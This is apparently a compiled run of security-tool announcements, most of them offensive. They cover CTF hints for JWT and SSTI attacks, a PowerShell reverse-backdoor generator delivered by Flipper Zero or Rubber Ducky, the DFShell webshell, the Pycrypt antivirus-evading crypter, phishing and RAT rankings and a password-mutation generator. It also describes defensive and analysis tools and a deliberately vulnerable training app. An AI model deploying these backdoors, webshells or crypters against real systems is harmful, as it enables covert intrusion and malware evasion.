  • The Open Redirect has some security restrictions. You have to find how to get around them. Analyze which strings are not allowed in the URL.
  • Cookies are not the only place where session information is stored. Reviewing the source code of the JavaScript files included in the application can help clear up doubts.

Stage 2: Access as admin

Display

At this stage, a token can be generated that allows access as admin. This is a typical JSON Web Token (JWT) attack, in which the token payload can be modified to escalate privileges.

The hint to solve this stage is that there is an endpoint that, given a JWT, returns a valid session cookie.

Stage 3: Read the /flag file

Display

At this stage, the /flag file can be read through a Server Site Template Injection (SSTI) vulnerability. To do this, you must get the application to run Python code on the server. It is possible to execute system commands on the server.

The hints to solve this stage are:

  • Vulnerable functionality is protected by two-factor authentication. Therefore, before exploiting the SSTI, a way to bypass the OTP code request must be found. There are times when the application trusts the requests that are made from the same server and the HTTP headers play an important role in this situation.

  • The SSTI is Blind, this means that the output of the code executed on the server is not obtained directly. The Python smtpd module allows you to create an SMTP server that prints messages it receives to standard output:

    sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25

  • The application uses Flask, so it can be inferred that the template engine is Jinja2 because it is recommended by the official Flask documentation and is widely used. You must get a Jinja2 compatible payload to get the final flag.

  • The email message has a character limitation. Information on how to bypass this limitation can be found on the Internet.

Solutions

Detailed solutions for each stage can be found in the Solutions folder.

Resources

The following resources may be helpful in resolving the stages:

Collaboration

Pull requests are welcome. If you find any bugs, please open an issue.



Powershell-Backdoor-Generator - Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads


Reverse backdoor written in Powershell and obfuscated with Python. Allowing the backdoor to have a new signature after every run. Also can generate auto run scripts for Flipper Zero and USB Rubber Ducky.

usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL convers ion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory

Features

  • Hak5 Rubber Ducky payload
  • Flipper Zero payload
  • Download Files from remote system
  • Fetch target computers public IP address
  • List local users
  • Find Intresting Files
  • Get OS Information
  • Get BIOS Information
  • Get Anti-Virus Status
  • Get Active TCP Clients
  • Checks for common pentesting software installed

Standard backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file in the current working directory will be created called backdoor.ps1

Bad USB/ USB Rubber Ducky attacks

When using any of these attacks you will be opening up a HTTP server hosting the backdoor. Once the backdoor is retrieved the HTTP server will be shutdown.

Payloads

  • Execute -- Execute the backdoor
  • BindAndExecute -- Place the backdoor in temp, bind the backdoor to startup and then execute it.

Flipper Zero Backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor.txt --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Place the text file you specified (e.g: powershell_backdoor.txt) into your flipper zero. When the payload is executed it will download and execute backdoor.ps1

Usb Rubber Ducky Backdoor

 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file named inject.bin will be placed in your current working directory. Java is required for this feature. When the payload is executed it will download and execute backdoor.ps1

Backdoor Execution

Tested on Windows 11, Windows 10 and Kali Linux

powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

To Do

  • Add Standard Backdoor
  • Find Writeable Directories
  • Get Windows Update Status

Output of 5 obfuscations/Runs

sha1:c7a5fa3e56640ce48dcc3e8d972e444d9cdd2306
sha1:b32dab7b26cdf6b9548baea6f3cfe5b8f326ceda
sha1:e49ab36a7ad6b9fc195b4130164a508432f347db
sha1:ba40fa061a93cf2ac5b6f2480f6aab4979bd211b
sha1:f2e43320403fb11573178915b7e1f258e7c1b3f0


Unhacked! Armory Edition 1 London 2023 – Call For Tools is Open

Attention all hackers and security researchers! The ToolsWatch team is back in London with a

Heap_Detective - The Simple Way To Detect Heap Memory Pitfalls In C++ And C


This tool uses the taint analysis technique for static analysis and aims to identify points of heap memory usage vulnerabilities in C and C++ languages. The tool uses a common approach in the first phase of static analysis, using tokenization to collect information.

The second phase has a different approach to common lessons of the legendary dragon book, yes the tool doesn't use AST or resources like LLVM following parsers' and standard tips. The approach present aims to study other ways to detect vulnerabilities, using custom vector structures and typical recursive traversal with ranking following taint point. So the result of the sum of these techniques is the Heap_detective.

The tool follows the KISS principle "Keep it simple, stupid!". There's more than one way to do a SAST tool, I know that. Yes, I thought to use graph database or AST, but this action cracked the KISS principle in the context of this project.

https://antonio-cooler.gitbook.io/coolervoid-tavern/detecting-heap-memory-pitfalls


Features

  • C and C++ tokenizer
  • List of heap static routes for each source with taint points for analysis
  • Analyser to detect double free vulnerability
  • Analyser to detect use after free vulnerability
  • Analyser to detect memory leak

To test, read the directory samplers to understand the context, so to run look that following:

$ git clone https://github.com/CoolerVoid/heap_detective

$ cd heap_detective

$ make
// to run
$ bin/heap_detective samplers/
note:
So don't try "$ cd bin; ./heap_detective"
first argv is a directory for recursive analysis

Note: tested in GCC 9 and 11

The first argument by command is a directory for recursive analysis. You can study bad practices in directory "samplers".

Future features

  • Analyser to detect off-by-one vulnerability
  • Analyser to detect wild pointer
  • Analyser to detect heap overflow vulnerability

Overview

Output example:




Collect action done

...::: Heap static route :::...
File path: samplers/example3.c
Func name: main
Var name: new
line: 10: array = new obj[100];
Sinks:
line: 10: array = new obj[100];
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example3.c
Func name: while
Var name: array
line: 27: array = malloc(1);
Sinks:
line: 27: array = malloc(1);
Taint: True
In Loop: false
line: 28: array=2;
Taint: false
In Loop: false
line: 30: array = malloc(3);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example5.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 11: free(ch_ptr);
Taint: True
In Loop: false< br/> line: 12: free(ch_ptr);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example1.c
Func name: main
Var name: buf1R1
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
Sinks:
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
Taint: True
In Loop: false
line: 26: free(buf1R1);
Taint: True
In Loop: false
line: 30: if (buf1R1) {
Taint: false
In Loop: false
line: 31: free(buf1R1);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example2.c
Func name: main
Var name: ch_ptr
line: 7: ch_ptr=malloc(100);
Sinks:
line: 7: ch_ptr=malloc(100);
Taint: True
In Loop: false
line: 11: ch_ptr = 'A';
Taint: false
In Loop: True
line: 12: free(ch_ptr);
Taint: True
In Loop: True
line: 13: printf("%s\n", ch_pt r);
Taint: false
In Loop: True

...::: Heap static route :::...
File path: samplers/example4.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 13: ch_ptr = 'A';
Taint: false
In Loop: false
line: 14: free(ch_ptr);
Taint: True
In Loop: false
line: 15: printf("%s\n", ch_ptr);
Taint: false
In Loop: false

...::: Heap static route :::...
File path: samplers/example6.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 11: free(ch_ptr);
Taint: True
In Loop: false
line: 13: ch_ptr = malloc(500);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example7.c
Fu nc name: special
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 15: free(ch_ptr);
Taint: True
In Loop: false
line: 16: ch_ptr = malloc(500);
Taint: True
In Loop: false
line: 17: ch_ptr=NULL;
Taint: false
In Loop: false
line: 25: char *ch_ptr = NULL;
Taint: false
In Loop: false

...::: Heap static route :::...
File path: samplers/example7.c
Func name: main
Var name: ch_ptr
line: 27: ch_ptr = malloc(100);
Sinks:
line: 27: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 30: free(ch_ptr);
Taint: True
In Loop: false
line: 32: ch_ptr = malloc(500);
Taint: True
In Loop: false

>>-----> Memory leak analyser

...::: Memory leak analyser :::...
File path: samplers/example3.c
F unction name: main
memory leak found!
line: 10: array = new obj[100];

...::: Memory leak analyser :::...
File path: samplers/example3.c
Function name: while
memory leak found!
line: 27: array = malloc(1);
line: 28: array=2;
line: 30: array = malloc(3);

...::: Memory leak analyser :::...
File path: samplers/example5.c
Function name: main
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Memory leak analyser :::...
File path: samplers/example1.c
Function name: main
memory leak found!
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Memory leak analyser :::...
File path: samplers/example2.c
Function name: main
memory leak found!
Maybe the function to liberate memory can be in a loo p context!
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

...::: Memory leak analyser :::...
File path: samplers/example6.c
Function name: main
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 13: ch_ptr = malloc(500);

...::: Memory leak analyser :::...
File path: samplers/example7.c
Function name: special
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 15: free(ch_ptr);
line: 16: ch_ptr = malloc(500);
line: 17: ch_ptr=NULL;
line: 25: char *ch_ptr = NULL;

...::: Memory leak analyser :::...
File path: samplers/example7.c
Function name: main
memory leak found!
line: 27: ch_ptr = malloc(100);
line: 30: free(ch_ptr);
line: 32: ch_ptr = malloc(500);

>>-----> Start double free analyser

...::: Double free analys er :::...
File path: samplers/example5.c
Function name: main
Double free found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Double free analyser :::...
File path: samplers/example1.c
Function name: main
Double free found!
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Double free analyser :::...
File path: samplers/example2.c
Function name: main
Double free found!
Maybe the function to liberate memory can be in a loop context!
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

>>-----> Start use after free analyser

...::: Use after free analyser :::...
File path: samplers/example5.c
Function name: main
Use after free found
l ine: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example1.c
Function name: main
Use after free found
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Use after free analyser :::...
File path: samplers/example2.c
Function name: main
Use after free found
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example4.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 13: ch_ptr = 'A';
line: 14: free(ch_ptr);
line: 15: printf("%s\n", ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example6.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 13: ch_ptr = malloc(500);

...::: Use after free analyser :::...
File path: samplers/example7.c
Function name: special
Use after free found
line: 8: ch_ptr = malloc(100);
line: 15: free(ch_ptr);
line: 16: ch_ptr = malloc(500);
line: 17: ch_ptr=NULL;
line: 25: char *ch_ptr = NULL;

...::: Use after free analyser :::...
File path: samplers/example7.c
Function name: main
Use after free found
line: 27: ch_ptr = malloc(100);
line: 30: free(ch_ptr);
line: 32: ch_ptr = malloc(500);






DFShell - The Best Forwarded Shell


██████╗ ███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
██╔══██╗██╔════╝██╔════╝██║ ██║███╔═══╝██║ ██║
██║ ██║█████╗ ███████╗███████║█████╗ ██║ ██║
██║ ██║██╔══╝ ╚════██║██╔══██║██╔══╝ ██║ ██║
██████╔╝██║ ███████║██║ ██║███████╗████████╗███████╗
╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

D3Ext's Forwarded Shell it's a python3 script which use mkfifo to simulate a shell into the victim machine. It creates a hidden directory in /dev/shm/.fs/ and there are stored the fifos. You can even have a tty over a webshell.

In case you want a good webshell with code obfuscation, login panel and more functions you have this webshell (scripted by me), you can change the username and the password at the top of the file, it also have a little protection in case of beeing discovered because if the webshell is accessed from localhost it gives a 404 status code


Why you should use DFShell?

To use other forwarded shells you have to edit the script to change the url and the parameter of the webshell, but DFShell use parameters to quickly pass the arguments to the script (-u/--url and -p/--parameter), the script have a pretty output with colors, you also have custom commands to upload and download files from the target, do port and host discovery, and it deletes the files created on the victim if you press Ctrl + C or simply exit from the shell.

*If you change the actual user from webshell (or anything get unstable) then execute: 'sh'*

Installation:

Install with pip

pip3 install dfshell

Install from source

git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements

One-liner

git clone https://github.com/D3Ext/DFShell && cd DFShell && pip3 install -r requirements

Usage:

It's simple, you pass the url of the webshell and the parameter that executes commands. I recommend you the most simple webshell

python3 DFShell.py -u http://10.10.10.10/webshell.php -p cmd

Demo:



Top 20 Most Popular Hacking Tools in 2022


As last year, this year we made a ranking with the most popular tools between January and December 2022.

Topics of the tools focus on PhishingInformation Gathering, Automation Tools, among others.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2022:


  1. Zphisher - Automated Phishing Tool


  2. CiLocks - Android LockScreen Bypass


  3. Arkhota - A Web Brute Forcer For Android


  4. GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints


  5. AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING


  6. Modded-Ubuntu - Run Ubuntu GUI On Your Termux With Much Features


  7. Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN


  8. Android_Hid - Use Android As Rubber Ducky Against Another Android Device


  9. Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool


  10. HackingTool - ALL IN ONE Hacking Tool For Hackers


  11. Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux


  12. Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words


  13. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  14. BITB - Browser In The Browser (BITB) Templates


  15. Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks


  16. Espoofer - An Email Spoofing Testing Tool That Aims To Bypass SPF/DKIM/DMARC And Forge DKIM Signatures


  17. Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products


  18. Grafiki - Threat Hunting Tool About Sysmon And Graphs


  19. VLANPWN - VLAN Attacks Toolkit


  20. linWinPwn - A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks





Happy New Year wishes the KitPloit team!


OFRAK - Unpack, Modify, And Repack Binaries


OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:

  • Identify and Unpack many binary formats
  • Analyze unpacked binaries with field-tested reverse engineering tools
  • Modify and Repack binaries with powerful patching strategies

OFRAK supports a range of embedded firmware file formats beyond userspace executables, including:

  • Compressed filesystems
  • Compressed & checksummed firmware
  • Bootloaders
  • RTOS/OS kernels

OFRAK equips users with:

  • A Graphical User Interface (GUI) for interactive exploration and visualization of binaries
  • A Python API for readable and reproducible scripts that can be applied to entire classes of binaries, rather than just one specific binary
  • Recursive identification, unpacking, and repacking of many file formats, from ELF executables, to filesystem archives, to compressed and checksummed firmware formats
  • Built-in, extensible integration with powerful analysis backends (angr, Binary Ninja, Ghidra, IDA Pro)
  • Extensibility by design via a common interface to easily write additional OFRAK components and add support for a new file format or binary patching operation

See ofrak.com for more details.


GUI Frontend

The web-based GUI view provides a navigable resource tree. For the selected resource, it also provides: metadata, hex or text navigation, and a mini map sidebar for quickly navigating by entropy, byteclass, or magnitude. The GUI also allows for actions normally available through the Python API like commenting, unpacking, analyzing, modifying and packing resources.

Getting Started

OFRAK uses Git LFS. This means that you must have Git LFS installed before you clone the repository! Install Git LFS by following the instructions here. If you accidentally cloned the repository before installing Git LFS, cd into the repository and run git lfs pull.

See docs/environment-setup for detailed instructions on how to install OFRAK.

Documentation

OFRAK has general documentation and API documentation. Both can be viewed at ofrak.com/docs.

If you wish to make changes to the documentation or serve it yourself, follow the directions in docs/README.md.

License

The code in this repository comes with an OFRAK Community License, which is intended for educational uses, personal development, or just having fun.

Users interested in OFRAK for commercial purposes can request the Pro License, which for a limited period is available for a free 6-month trial. See OFRAK Licensing for more information.

Contributing

Red Balloon Security is excited for security researchers and developers to contribute to this repository.

For details, please see our contributor guide and the Python development guide.

Support

Please contact ofrak@redballoonsecurity.com, or write to us on the OFRAK Slack with any questions or issues regarding OFRAK. We look forward to getting your feedback! Sign up for the OFRAK Mailing List to receive monthly updates about OFRAK code improvements and new features.


This material is based in part upon work supported by the DARPA under Contract No. N66001-20-C-4032. Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the DARPA. Distribution Statement “A” (Approved for Public Release, Distribution Unlimited).



Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products


Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products


Important:

  1. Make Sure your payload file have all the libraries import and it will be a valid payload file

How To Use:

  1. Find Any Python Based Backdoor/RAT on github.
  2. Crypt its payload with pycrypt
  3. Now Convert crypted payload to exe using pyinstaller
  4. Enjoy

Note:

  1. Don't Upload Any Payloads To VirusTotal.com Bcz This tool will not work with Time.
  2. Virustotal Share Signatures With AV Comapnies.
  3. Again Don't be an Idiot!

KleenScan Scanner Result:-

  1. Generated stub.py Result:- https://kleenscan.com/scan_result/39e61c692ee91dd6cd48aca77a8bb220ef27fcc40df75807d4a1f96b4db8df69
  2. Crypter Code Result:- https://kleenscan.com/scan_result/24487da561419105e29cabd5fc66c503ee767719029fae2f9a041b04d6a75d4b

Download Python3:

*:- For Windows: https://www.python.org/ftp/python/3.10.7/python-3.10.7-amd64.exe

*:- For Linux:

  1. sudo apt-get install python3
  2. sudo apt-get install python3-pip

Requriements:-

  1. Make Sure Python3 And Pip Installed
  2. pip install termcolor
  3. pip install requests

How To Run:-

*:- For Windows:-

  1. Make Sure python3 and pip is installed and requriements also installed
  2. python pycrypt.py
  3. Then give the path of your payload file and enjoy

*:- For Linux:-

  1. Make Sure All Requriements is installed.
  2. python3 pycrypt.py
  3. Then enter the path of your payload file and enjoy

Platforms:

  1. Windows
  2. Linux Based Os

How To Install:

  1. git clone https://github.com/pycrypt
  2. cd pycrypt
  3. python3 pycrypt.py

Features:-

  1. FUD Ratio 0/40
  2. Bypass Any EDR's Solutions
  3. Lightweight Crypter
  4. Very Small And Simple Crypter

Warning:-

Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.



Slicer - Tool To Automate The Boring Process Of APK Recon


A tool to automate the recon process on an APK file.

Slicer accepts a path to an extracted APK file and then returns all the activities, receivers, and services which are exported and have null permissions and can be externally provoked.

Note: The APK has to be extracted via jadx or apktool.


Summary

Why?

I started bug bounty like 3 weeks ago(in June 2020) and I have been trying my best on android apps. But I noticed one thing that in all the apps there were certain things which I have to do before diving in deep. So I just thought it would be nice to automate that process with a simple tool.

Why not drozer?

Well, drozer is a different beast. Even though it does finds out all the accessible components but I was tired of running those commands again and again.

Why not automate using drozer?

I actually wrote a bash script for running certain drozer commands so I won't have to run them manually but there was still some boring stuff that had to be done. Like Checking the strings.xml for various API keys, testing if firebase DB was publically accessible or if those google API keys have setup any cap or anything on their usage and lot of other stuff.

Why not search all the files?

I think that a tool like grep or ripgrep would be much faster to search through all the files. So if there is something specific that you want to search it would be better to use those tools. But if you think that there is something which should be checked in all the android files then feel free to open an issue.

Features

  • Check if the APK has set the android:allowbackup to true

  • Check if the APK has set the android:debuggable to true.

  • Return all the activities, services and broadcast receivers which are exported and have null permission set. This is decided on the basis of two things:

    • android:exporte=true is present in any of the component and have no permission set.
    • If exported is not mention then slicer check if any Intent-filters are defined for that component, if yes that means that component is exported by default(This is the rule given in android documentation.)
  • Check the Firebase URL of the APK by testing it for .json trick.

    • If the firebase URL is myapp.firebaseio.com then it will check if https://myapp.firebaseio.com/.json returns something or gives permission denied.
    • If this thing is open then that can be reported as high severity.
  • Check if the google API keys are publically accessible or not.

    • This can be reported on some bounty programs but have a low severity.
    • But most of the time reporting this kind of thing will bring out the pain of Duplicate.
    • Also sometimes the company can just close it as not applicable and will claim that the KEY has a usage cap - r/suspiciouslyspecific
  • Return other API keys that are present in strings.xml and in AndroidManifest.xml

  • List all the file names present in /res/raw and res/xml directory.

  • Extracts all the URLs and paths.

    • These can be used with tool like dirsearch or ffuf.

Installation

  • Clone this repository
git clone https://github.com/mzfr/slicer
  • cd slicer
  • Now you can run it: python3 slicer.py -h

Usage

It's very simple to use. Following options are available:

Extract information from Manifest and strings of an APK

Usage:
slicer [OPTION] [Extracted APK directory]

Options:

-d, --dir path to jadx output directory
-o, --output Name of the output file(not implemented)

I have not implemented the output flag yet because I think if you can redirect slicer output to a yaml file it will a proper format.

Usage Example

  • Extract information from the APK and display it on the screen.
python3 slicer.py -d path/to/extact/apk -c config.json

Acknowledgements and Credits

The extractor module used to extract URLs and paths is taken from apkurlgrep by @ndelphit

Contribution

All the features implemented in this are things that I've learned in past few weeks, so if you think that there are various other things which should be checked in an APK then please open an issue for that feature and I'd be happy to implement that :)

Support

If you'd like you can buy me some coffee:



Parrot 5.1 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Parrot OS 5.1 is officially released. We're proud to say that the new version of Parrot OS 5.1 is available for download; this new version includes a lot of improvements and updates that makes the distribution more performing and more secure.

How do I get Parrot OS?

You can download Parrot OS by clicking here and, as always, we invite you to never trust third part and unofficial sources.

If you need any help or in case the direct downloads don't work for you, we also provide official Torrent files, which can circumvent firewalls and network restrictions in most cases.

How do I upgrade from a previous version?

First of all, we always suggest to update your version for being sure that is stable and functional. You can upgrade an existing system via APT using one of the following commands:

  • sudo parrot-upgrade

or

  • sudo apt update && sudo apt full-upgrade

Even if we recommend to always update your version, it is also recommended to do a backup and re-install the latest version to have a cleaner and more reliable user experience, especially if you upgrade from a very old version of parrot.

What's new in Parrot OS 5.1

New kernel 5.18.

You can find all the infos about the new Kernel 5.18 by clickig on this link.

Updated docker containers

Our docker offering has been revamped! We now provide our dedicated parrot.run image registry along with the default docker.io one.

All our images are now natively multiarch, and support amd64 and arm64 architectures.

Our containers offering was updated as well, and we are committed to further improve it.

Run docker run --rm -ti --network host -v $PWD/work:/work parrot.run/core and give our containers a try without having to install the system, or visit our Docker images page to explore the other containers we offer.

Updated backports.

Several packages were updated and backported, like the new Golang 1.19 or Libreoffice 7.4. This is part of our commitment to provide the latest version of every most important software while choosing a stable LTS release model.

To make sure to have all the latest packages installed from our backports channel, use the following commands:

  • sudo apt update
  • sudo apt full-upgrade -t parrot-backports

System updates

The system has received important updates to some opf its key packages, like parrot-menu, which now provides additional launchers to our newly imported tools; or parrot-core, which now provides a new firefox profile with improved security hardening, plus some minor bugfixes to our zshrc configuration.

Firefox profile overhault

As mentioned earlier, our Firefox profile has received a major update that significantly improves the overall privacy and security.

Our bookmarks collection has been revamped, and now includes new resources, including OSINT services, new learning sources and other useful resources for hackers, developers, students and security researchers.

We have also boosted our effort to avoid Mozilla telemetry and bring DuckDuckGo back as the default search engine, while we are exploring other alternatives for the future.

Tools updates

Most of our tools have received major version updates, especially our reverse engineering tools, like rizin and rizin-cutter.

Important updates involved metasploit, exploitdb and other popular tools as well.

New AnonSurf 4.0

The new AnonSurf 4 represents a major upgrade for our popular anonymity tool.

Anonsurf is our in-house anonymity solution that routes all the system traffic through TOR automatically without having to set up proxy settings for each individua program, and preventing traffic leaking in most cases.

The new version provides significant fixes and reliability updates, fully supports debian systems without the old resolvconf setup, has a new user interface with improved system tray icon and settings dialog window, and offers a better overall user experience.

Parrot IoT improvements

Our IoT version now implements significant performance improvements for the various Raspberry Pi boards, and finally includes Wi-Fi support for the Raspberry Pi 400 board.

The Parrot IoT offering has also been expanded, and it now offers Home and Security editions as well, with a full MATE desktop environment exactly like the desktop counterpart.

Architect Edition improvements

Our popular Architect Edition now implements some minor bugfixes and is more reliable than ever.

The Architect Edition is a special edition of Parrot that enables the user to install a barebone Parrot Core system, and then offers a selection of additional modules to further customize the system.

You can use Parrot Architect to install other desktop environments like KDE, GNOME or XFCE, or to install a specific selection of tools.

New infrastructure powered by Parrot and Kubernetes

The Architect Edition is also used internally by the Parrot Engineering Team to install Parrot Server Edition on all the servers that power our infrastructure, which is officially 100% powered by Parrot and Kubernetes.

This is a major change in the way we handle our infrastructure, which enables us to implement better autoscaling, easier management, smaller attack surface and an overall better network, with the improved scalability and security we were looking for.



Erlik 2 - Vulnerable-Flask-App


Erlik 2 - Vulnerable-Flask-App

Tested - Kali 2022.1

Description

It is a vulnerable Flask Web App. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • HTML Injection
  • XSS
  • SSTI
  • SQL Injection
  • Information Disclosure
  • Command Injection
  • Brute Force
  • Deserialization
  • Broken Authentication
  • DOS
  • File Upload

Installation

git clone https://github.com/anil-yelken/Vulnerable-Flask-App

cd Vulnerable-Flask-App

sudo pip3 install -r requirements.txt

Usage

python3 vulnerable-flask-app.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns


psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.


Pentesting Corporate Environments

System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:

 

The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

transformations = [
{'a' : '@'},
{'b' : '8'},
{'e' : '3'},
{'g' : ['9', '6']},
{'i' : ['1', '!']},
{'o' : '0'},
{'s' : ['$', '5']},
{'t' : '7'}
]

Individuals

When it comes to people, i think we all have (more or less) set passwords using a mutation of one or more words that mean something to us e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "!@#". Well, guess what?

Installation

No special requirements. Just clone the repo and make the script executable:

git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py

Usage

./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

The help dialog [ -h, --help ] includes usage details and examples.

Usage Tips

  1. Combining options --years and --append-numbering with a --numbering-limit ≥ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
  2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.

Future

I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.



Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...


  • What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent。red team tools Code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects. In principle, do not repeat the wheel, unless there are bugs, problems
  • Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.
